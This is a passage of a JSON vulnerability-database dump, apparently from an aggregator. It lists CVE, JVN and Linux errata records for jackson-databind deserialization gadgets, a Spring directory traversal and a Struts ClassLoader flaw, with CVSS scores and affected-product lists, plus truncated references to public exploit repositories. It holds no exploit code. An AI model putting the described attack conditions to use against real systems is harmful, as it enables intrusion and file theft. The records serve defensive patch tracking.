"cpe:/a:oracle:banking_platform:2.4.1", "cpe:/a:netapp:service_level_manager:-", "cpe:/a:redhat:jboss_enterprise_application_platform:7.3", "cpe:/a:oracle:global_lifecycle_management_nextgen_oui_framework:12.2.1.4.0", "cpe:/a:oracle:banking_platform:2.6.0", "cpe:/a:oracle:retail_sales_audit:14.1", "cpe:/a:oracle:primavera_unifier:16.1", "cpe:/a:oracle:database_server:12.2.0.1", "cpe:/a:oracle:retail_merchandising_system:16.0.2", "cpe:/a:oracle:communications_evolved_communications_application_server:7.1", "cpe:/a:oracle:banking_platform:2.7.1", "cpe:/a:oracle:banking_platform:2.6.2", "cpe:/a:oracle:primavera_gateway:18.8.8", "cpe:/a:oracle:primavera_unifier:16.2", "cpe:/a:oracle:communications_cloud_native_core_network_slice_selection_function:1.2.1", "cpe:/a:oracle:retail_merchandising_system:15.0.3", "cpe:/o:fedoraproject:fedora:31", "cpe:/a:oracle:communications_billing_and_revenue_management:7.5.0.23.0", "cpe:/a:oracle:communications_calendar_server:8.0.0.3.0", "cpe:/a:oracle:global_lifecycle_management_nextgen_oui_framework:13.9.4.2.2", "cpe:/a:oracle:primavera_unifier:19.12", "cpe:/a:netapp:active_iq_unified_manager:*", "cpe:/a:oracle:webcenter_portal:12.2.1.3.0", "cpe:/a:oracle:communications_calendar_server:8.0.0.2.0"], "id": "CVE-2019-16942", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16942", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*", "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_server:19c:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:global_lifecycle_management_nextgen_oui_framework:13.9.4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:19.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_application_adapters:19.1.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:20.6:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_merchandising_system:15.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_server:18c:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_engineering_-_installer_\\&_deployment:2.20.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:17.12.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:20.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:global_lifecycle_management_nextgen_oui_framework:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:global_lifecycle_management_nextgen_oui_framework:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:webcenter_portal:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:service_level_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:18.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_unifier:17.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_merchandising_system:16.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_merchandising_system:16.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_server:12.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:oracle:banking_platform:2.9.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:1.2.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:36:33", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-01T17:15:00", "type": "cve", "title": "CVE-2019-16943", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16943"], "modified": "2022-10-29T02:33:00", "cpe": ["cpe:/a:oracle:primavera_gateway:19.12.0", "cpe:/a:oracle:global_lifecycle_management_nextgen_oui_framework:12.2.1.3.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:oracle:banking_platform:2.5.0", "cpe:/a:redhat:jboss_enterprise_application_platform:7.2", "cpe:/a:netapp:oncommand_api_services:-", "cpe:/o:fedoraproject:fedora:30", "cpe:/a:oracle:primavera_gateway:17.12.6", "cpe:/a:oracle:banking_platform:2.7.0", "cpe:/a:netapp:steelstore_cloud_integrated_storage:-", "cpe:/a:oracle:webcenter_sites:12.2.1.4.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:oracle:weblogic_server:12.2.1.4.0", "cpe:/a:oracle:webcenter_portal:12.2.1.4.0", "cpe:/a:oracle:goldengate_application_adapters:19.1.0.0.0", "cpe:/a:oracle:primavera_gateway:16.2", "cpe:/a:oracle:jd_edwards_enterpriseone_tools:9.2", "cpe:/a:oracle:banking_platform:2.6.1", "cpe:/a:netapp:active_iq_unified_manager:*", "cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/o:debian:debian_linux:10.0", "cpe:/a:oracle:banking_platform:2.4.0", "cpe:/a:oracle:webcenter_sites:12.2.1.3.0", "cpe:/a:oracle:banking_platform:2.9.0", "cpe:/a:oracle:jd_edwards_enterpriseone_orchestrator:9.2", "cpe:/a:oracle:communications_billing_and_revenue_management:12.0.0.3.0", "cpe:/a:oracle:siebel_engineering_-_installer_\\&_deployment:2.20.5", "cpe:/a:oracle:retail_merchandising_system:16.0.3", "cpe:/a:netapp:oncommand_workflow_automation:-", "cpe:/a:oracle:banking_platform:2.4.1", "cpe:/a:oracle:trace_file_analyzer:12.2.0.1", "cpe:/a:redhat:jboss_enterprise_application_platform:7.3", "cpe:/a:oracle:global_lifecycle_management_nextgen_oui_framework:12.2.1.4.0", "cpe:/a:oracle:banking_platform:2.6.0", "cpe:/a:oracle:retail_sales_audit:14.1", "cpe:/a:oracle:retail_merchandising_system:16.0.2", "cpe:/a:oracle:communications_evolved_communications_application_server:7.1", "cpe:/a:oracle:banking_platform:2.7.1", "cpe:/a:oracle:banking_platform:2.6.2", "cpe:/a:oracle:trace_file_analyzer:19c", "cpe:/a:oracle:primavera_gateway:16.1", "cpe:/a:oracle:trace_file_analyzer:18c", "cpe:/a:oracle:primavera_gateway:18.8.8", "cpe:/a:oracle:retail_merchandising_system:15.0.3", "cpe:/a:oracle:communications_cloud_native_core_network_slice_selection_function:1.2.1", "cpe:/o:fedoraproject:fedora:31", "cpe:/a:oracle:communications_billing_and_revenue_management:7.5.0.23.0", "cpe:/a:oracle:communications_calendar_server:8.0.0.3.0", "cpe:/a:oracle:global_lifecycle_management_nextgen_oui_framework:13.9.4.2.2", "cpe:/a:netapp:service_level_manager:-", "cpe:/a:oracle:webcenter_portal:12.2.1.3.0", "cpe:/a:oracle:communications_calendar_server:8.0.0.2.0"], "id": "CVE-2019-16943", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16943", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*", "cpe:2.3:a:oracle:trace_file_analyzer:18c:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:global_lifecycle_management_nextgen_oui_framework:13.9.4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*", "cpe:2.3:a:oracle:primavera_gateway:19.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_application_adapters:19.1.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_merchandising_system:15.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:17.12.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_engineering_-_installer_\\&_deployment:2.20.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:global_lifecycle_management_nextgen_oui_framework:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:trace_file_analyzer:12.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:global_lifecycle_management_nextgen_oui_framework:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:trace_file_analyzer:19c:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:webcenter_portal:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:service_level_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:18.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_merchandising_system:16.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_merchandising_system:16.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.2.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:16.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:1.2.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:23:01", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-17T17:29:00", "type": "cve", "title": "CVE-2019-12086", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2022-04-20T00:15:00", "cpe": ["cpe:/a:fasterxml:jackson-databind:2.7.9.5", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:fasterxml:jackson-databind:2.8.11.3"], "id": "CVE-2019-12086", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12086", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:fasterxml:jackson-databind:2.7.9.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:fasterxml:jackson-databind:2.8.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}], "jvn": [{"lastseen": "2023-05-27T10:34:00", "description": "Spring Framework is a Java framework for developing web applications. Spring Framework contains a directory traversal vulnerability.\n\n ## Impact\n\nA remote attacker may be able to access arbitrary files on the server.\n\n ## Solution\n\n**Update the software** \nUsers of 3.x should update to version 3.2.9 or later and users of 4.x should update to version 4.0.5 or later. \nFor more information, refer to the developer's website.\n\n ## Products Affected\n\n * Spring Framework versions 4.0.0 through 4.0.4\n * Spring Framework versions 3.2.0 through 3.2.8\n\nAccording to the developer, version 3.1.1 has been confirmed to be affected and other unsupported versions may also be affected.\n", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "jvn", "title": "JVN#49154900: Spring Framework vulnerable to directory traversal", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3578"], "modified": "2016-06-21T00:00:00", "id": "JVN:49154900", "href": "http://jvn.jp/en/jp/JVN49154900/index.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T10:34:00", "description": "TERASOLUNA Server Framework for Java(Web) provided by NTT DATA Corporation is a software framework for creating Java web applications. TERASOLUNA Server Framework for Java(Web) bundles Apache Struts 1.2.9, which contains a vulnerability where the ClassLoader may be manipulated ([CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>)). Therefore, this vulnerability affects TERASOLUNA Server Framework for Java(Web) as well.\n\n ## Impact\n\nOn a server where the product in running, a remote attacker may steal information or execute arbitrary code.\n\n ## Solution\n\n**Update the Software \n**Update to the latest version according to the information provided by the developer. \n \nOn 2014 May 23, TERASOLUNA Server Framework for Java(Web) 2.0.5.2, which contains Apache Struts 1.2.9 with SP1 by TERASOLUNA has been released. \n\n\n ## Products Affected\n\n * TERASOLUNA Server Framework for Java(Web) 2.0.0.1 to 2.0.5.1\n", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "jvn", "title": "JVN#30962312: TERASOLUNA Server Framework for Java(Web) vulnerable to ClassLoader manipulation", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2014-06-17T00:00:00", "id": "JVN:30962312", "href": "http://jvn.jp/en/jp/JVN30962312/index.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2021-11-23T18:27:59", "description": " ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-05T00:00:00", "type": "oraclelinux", "title": "pki-core:10.6 and pki-deps:10.6 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17531"], "modified": "2020-05-05T00:00:00", "id": "ELSA-2020-1644", "href": "http://linux.oracle.com/errata/ELSA-2020-1644.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:08", "description": "[1.2.9-4jpp.7]\n- Resolves: rhbz#1092457\n- CVE-2014-0114: Fixed ClassLoader manipulation vulnerability\n- Added dist tag to release", "cvss3": {}, "published": "2014-05-06T00:00:00", "type": "oraclelinux", "title": "struts security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2014-05-06T00:00:00", "id": "ELSA-2014-0474", "href": "http://linux.oracle.com/errata/ELSA-2014-0474.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "almalinux": [{"lastseen": "2023-05-27T17:12:37", "description": "The Public Key Infrastructure (PKI) Core contains fundamental packages required by AlmaLinux Certificate System.\n\nSecurity Fix(es):\n\n* jackson-databind: Serialization gadgets in com.zaxxer.hikari.HikariConfig (CVE-2019-14540)\n\n* jackson-databind: Serialization gadgets in com.zaxxer.hikari.HikariDataSource (CVE-2019-16335)\n\n* jackson-databind: Serialization gadgets in org.apache.commons.dbcp.datasources.* (CVE-2019-16942)\n\n* jackson-databind: Serialization gadgets in com.p6spy.engine.spy.P6DataSource (CVE-2019-16943)\n\n* jackson-databind: Serialization gadgets in org.apache.log4j.receivers.db.* (CVE-2019-17531)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the AlmaLinux Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-28T09:00:20", "type": "almalinux", "title": "Moderate: pki-core:10.6 and pki-deps:10.6 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17531"], "modified": "2020-04-28T09:00:04", "id": "ALSA-2020:1644", "href": "https://errata.almalinux.org/8/ALSA-2020-1644.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-02-23T18:41:15", "description": "# \u6587\u6863\u8bf4\u660e\n\nCVE-2019-12086\njackson unserialize\n\n# \u6f0f\u6d1e\u5229\u7528\n\n1\u3001\u542f\u52a8\u6076\u610fMyS...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2020-05-22T17:10:10", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Fasterxml Jackson-Databind", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2022-02-23T14:25:50", "id": "B4CCD6DC-671B-58FE-9826-B4F9C361A650", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2021-12-15T14:52:08", "description": "# jackson-CVE-2019-12086\n\n# \u6f0f\u6d1e\u63cf\u8ff0\n\u5728\u5f00\u542fDefault Typing\u7684\u60c5\u51b5\u4e0b\uff0c\u4e14classpat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-05-26T03:19:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Fasterxml Jackson-Databind", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2021-12-15T14:36:25", 